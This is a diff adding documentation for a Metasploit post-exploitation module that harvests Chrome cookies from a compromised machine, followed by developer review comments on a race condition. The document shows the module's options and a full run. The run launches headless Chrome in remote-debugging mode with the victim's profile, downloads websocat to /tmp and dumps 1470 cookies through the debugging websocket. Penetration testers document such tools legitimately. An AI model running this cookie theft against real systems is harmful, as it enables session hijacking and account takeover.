documentation/modules/post/chrome/gather/cookies.md

```diff
@@ -0,0 +1,114 @@
+
+  **REMOTE_DEBUGGING_PORT**
+  Port to tell Chrome to expose Remote Debugging on. Default is the normal remote debugging port, `9222`.
+
+## Scenarios
+
+### Linux (or OS X)
+
+  Suppose you've got a session on the target machine.
+
+  To extract the target machine's Chrome cookies
+
+  ```
+  msf > use post/chrome/gather/cookies
+  msf post(chrome/gather/cookies) > set SESSION <your session ID>
+
+  msf5 post(test/chrome_cookies) > options
+
+  Module options (post/test/chrome_cookies):
+
+     Name                   Current Setting    Required  Description
+     ----                   ---------------    --------  -----------
+     CHROME_BINARY_PATH                        no        The path to the user's Chrome binary (leave blank to use the default for the OS)
+     COOKIE_STORAGE_PATH    /tmp/websocat.log  no        Where to write the retrieved cookies temporarily
+     HEADLESS_URL           about://blank      no        The URL to load with the user's headless chrome
+     MAX_RETRIES            3                  no        Max retries for websocket request to Chrome remote debugging URL.
+     REMOTE_DEBUGGING_PORT  9222               no        Port on target machine to use for remote debugging protocol
+     SESSION                1                  yes       The session to run this module on.
+     WEBSOCAT_STORAGE_PATH  /tmp/websocat      no        Where to write the websocat binary temporarily while it is used
+
+  msf post(chrome/gather/cookies) > run
+
+  [*] Activated Chrome's Remote Debugging via google-chrome --headless --user-data-dir="/home/target_username/.config/google-chrome/" --remote-debugging-port=9222 about://blank
+  [!] Writing file /tmp/websocat to disk temporarily
+  [*] Downloading https://github.com/vi/websocat/releases/download/v1.2.0/websocat_nossl_i386-linux to /tmp/websocat
+  [!] Writing file /tmp/websocat.log to disk temporarily
+  [-] Error running echo '{"id": 1, "method": "Network.getAllCookies"}' | /tmp/websocat -q ws://localhost:9222/devtools/page/2BB6CD14146BFB67C4523D85A348508 > /tmp/websocat.log
+  [-] /bin/sh: 1: /tmp/websocat: Text file busy
+  [-] No data read from websocket debugger url ws://localhost:9222/devtools/page/2BB6CD14146BFB67C4523D85A348508. Retrying... (Retries left: 2)
+  [!] Writing file /tmp/websocat.log to disk temporarily
+  [+] Read 1470 cookies from ws://localhost:9222/devtools/page/2BB6CD14146BFB67C4523D85A348508
+  [*] Deleted /tmp/websocat
+  [*] Deleted /tmp/websocat.log
+  [+] Chrome Cookies stored in /home/your_username/.msf4/loot/20181203153956_default_127.0.0.1_chrome.gather.co_192519.txt
+  [*] Post module execution completed
+  ```
+  In this example, a race condition occurred between writing the websocat binary and executing it. The module caught this and retried so it can continue gracefully.
```

Comment:
Just checking, `Rex.sleep` sleeps on the meterpreter-side, not the msf side, right?

Reply:
It looks like this race is happening because `cmd_exec` doesn't block. Am I right in assuming that? (i.e. `cmd_exec` can return before the command it's calling finishes execution). Is there some metasploit-standard way to force a call to `cmd_exec` to happen after another call?